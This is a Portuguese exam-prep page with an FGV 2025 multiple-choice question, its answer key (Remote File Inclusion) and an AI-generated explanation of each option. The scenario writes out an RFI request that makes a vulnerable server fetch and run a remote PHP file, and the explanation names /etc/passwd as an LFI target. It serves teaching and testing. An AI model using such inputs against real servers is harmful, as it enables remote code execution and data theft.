Pular para o conteúdo principal

Questão de Segurança da Informação — Análise de Vulnerabilidade e Gestão de Riscos — FGV 2025

Segurança da InformaçãoAnálise de Vulnerabilidade e Gestão de Riscos
Código
fg121852
Banca
FGV
Órgão
TCE-RR
Ano
2025
Nível
Superior
Cargo
Analista Administrativo - Tecnologia da Informação, com especialidade em Desenvolvimento de Sistemas
A página web da sociedade empresária Exemplo1234, disponível na internet, permite que internautas acessem o edital de uma vaga de trabalho por meio do endereço eletrônico http://empresa1234.com/vaga.php?file=vaga.pdf.

Durante a verificação de vulnerabilidades contratada por essa empresa, foi observado que o servidor da página web da Empresa1234 processava o valor fornecido no parâmetro file sem realizar validação ou sanitização adequada.

Como resultado, foi possível incluir e executar no servidor o conteúdo de um arquivo malicioso hospedado no endereço http://testevulnerabilidade.com/badpage.php

O teste foi realizado utilizando o seguinte endereço:

http://empresa1234.com/vaga.php?file=http://testevulnerabilida de.com/badpage.php

Ao acessar essa URL, o conteúdo do arquivo badpage.php foi carregado e executado diretamente pelo servidor da Empresa1234, comprometendo sua segurança.

O tipo de vulnerabilidade presente no servidor de página da Empresa1234 é o
  1. ALFI – Local File Inclusion.
  2. BXSS – Cross-Site Scripting.
  3. CSQL Injection.
  4. DRFI – Remote File Inclusion.
  5. EFPD – Full Path Disclosure.
Revelar gabarito e comentário

GabaritoD — RFI – Remote File Inclusion.

Comentário gerado por IA. É um apoio ao estudo, ancorado em fontes, mas pode conter imprecisões — confira sempre na fonte oficial (lei, súmula, edital e gabarito da banca). Encontrou um erro? Use “Reportar”.

Vulnerabilidades Web: File Inclusion

Gabarito: letra D — RFI (Remote File Inclusion). A vulnerabilidade ocorre quando o servidor inclui e executa um arquivo externo sem validação, como demonstrado pelo uso de uma URL remota no parâmetro file. A diferença crucial entre RFI e LFI está na origem do arquivo: remoto versus local.

A banca testa a capacidade de distinguir os tipos de ataque a partir da descrição do comportamento. No caso, o conteúdo de http://testevulnerabilidade.com/badpage.php foi carregado e executado — isso é a marca registrada do RFI.

File Inclusion
  • 1LFI (Local)
    • Arquivo do próprio servidor
    • Ex.: /etc/passwd
  • 2RFI (Remoto)
    • Arquivo de URL externa
    • Ex.: http://.../badpage.php
LEVEL · soulevel.com.br

Alternativa A — ❌ Incorreta

LFI (Local File Inclusion) envolve a inclusão de arquivos que já estão no próprio servidor (ex.: /etc/passwd). A URL fornecida é remota, o que elimina essa possibilidade.

Alternativa B — ❌ Incorreta

XSS (Cross-Site Scripting) explora a injeção de scripts no lado do cliente (navegador), não no servidor. O ataque descrito executa código no servidor, não no cliente.

Alternativa C — ❌ Incorreta

SQL Injection visa manipular consultas ao banco de dados, geralmente por meio de parâmetros que interagem com SQL. Não há evidência de manipulação de consultas SQL no cenário.

Alternativa D — ✅ Correta ⟵ GABARITO

RFI ocorre quando o servidor inclui um arquivo de um endereço remoto sem sanitização. O exemplo da URL com http://... é exatamente o vetor desse ataque. O servidor baixa e executa o código malicioso remoto.

Alternativa E — ❌ Incorreta

FPD (Full Path Disclosure) revela caminhos absolutos do sistema (ex.: C:\www\index.php). Não há exposição de caminhos no cenário; há inclusão e execução de código.

PEGA ESSA DICA!

Para diferenciar LFI de RFI, pergunte: a inclusão é de um arquivo local (caminho do próprio servidor) ou remoto (URL externa)? Se for remota, é RFI. Se for local, é LFI. Essa é a principal chave de prova.

Gabarito: letra D

Link permanente: /questoes/fg121852